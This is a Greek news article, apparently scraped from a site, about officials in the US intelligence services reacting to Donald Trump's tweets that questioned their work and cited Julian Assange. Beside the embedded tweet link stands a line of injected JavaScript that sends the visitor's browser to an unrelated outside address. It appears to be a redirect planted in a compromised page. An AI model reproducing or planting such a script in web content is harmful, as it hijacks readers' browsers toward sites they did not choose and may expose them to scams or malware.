Ένταση προκαλεί ο Τραμπ με τα tweet για τον τρόπο δράσης των αμερικανικών μυστικών υπηρεσιών

0
7

 

Mε σειρά αναρτήσεών του στον λογαριασμό του στο twitter ο νεοεκλεγείς πρόεδρος των ΗΠΑ, Ντόναλντ Τραμπ, προκάλεσε αναστάτωση μεταξύ των αξιωματούχων των αμερικανικών μυστικών υπηρεσιών.

Ο Τραμπ δεν διστάζει να αμφισβητήσει δημοσίως το έργο τους.

«Κανένας δεν επιθυμεί να έρθει σε σύγκρουση με το νέο αφεντικό. Ωστόσο οδηγούμαστε σε αυτή τη νέα εποχή η οποία είναι επιθετική«, δήλωσε ένας αξιωματούχος.

Ένας άλλος πρόσθεσε: «Είναι λυπηρό όταν πολιτικοί δίνουν μεγαλύτερη βαρύτητα στον Ρώσο πρόεδρο Βλαντιμίρ Πούτιν αλλά και στον ιδρυτή του WikiLeaks Τζούλιαν Ασάνζ παρά στους Αμερικανούς πράκτορες που θέτουν σε κίνδυνο τη ζωή τους καθημερινά προκειμένου να εξασφαλίσουν μία αντικειμενική ανάλυση των πληροφοριών«.

Το σχόλιο αυτό αναφέρεται σε ανάρτηση του Τραμπ στο Twitter, στην οποία αναφέρθηκε σε δήλωση του Ασάνζ ότι δεν υπέκλεψε τα ηλεκτρονικά μηνύματα του Δημοκρατικού Κόμματος από τους Ρώσους, οι οποίοι επίσης απορρίπτουν τις καταγγελίες για εμπλοκή τους στην υπόθεση.

https://twitter.com/realDonaldTrump/status/816638194468999169 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here